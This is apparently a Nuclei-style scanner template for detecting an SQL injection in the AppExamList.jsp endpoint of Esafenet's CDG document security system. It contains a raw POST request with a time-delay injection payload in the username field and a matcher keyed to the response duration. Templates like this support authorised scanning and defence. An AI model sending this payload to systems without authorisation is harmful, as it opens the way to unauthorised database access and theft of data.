id: esafenet-cdgserver3-AppExamList-sqli
info:
  name: 亿赛通电子文档安全管理系统 AppExamList.jsp SQL注入漏洞
  author: leadlife
  severity: high
  description: 亿赛通电子文档安全管理系统的AppExamList.jsp接口存在SQL注入漏洞。攻击者可以通过构造特定的POST请求，在多个参数如username、AppTate、startTime、endTime中注入恶意SQL代码，利用该漏洞对数据库执行任意SQL操作。攻击者可以通过注入WAITFOR DELAY命令，导致数据库响应时间延迟，从而确认SQL注入的成功。此漏洞可能导致数据库中的敏感信息泄露、篡改或删除，严重威胁系统的安全性和数据完整性。
  reference: 
    - https://www.yuque.com/lvguo-pibd8/fqbwsx/mkgew0iuifdegf98
  classification:
    cve-id: 
  metadata:
    verified: false
    fofa-query: demo
    tips:
    repair:
    sqlmap:
    version:
  tags: sqli,esafenet

http:
  - raw:  
      - |
        @timeout: 15s
        POST /CDGServer3/client/AppExamList.jsp;Servicelogin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 37

        username=1'WAITFOR+DELAY'0%3a0%3a5'--

    matchers:
      - type: dsl
        dsl:
          # - status_code == 200
          - duration >= 5 && duration < 9
        condition: and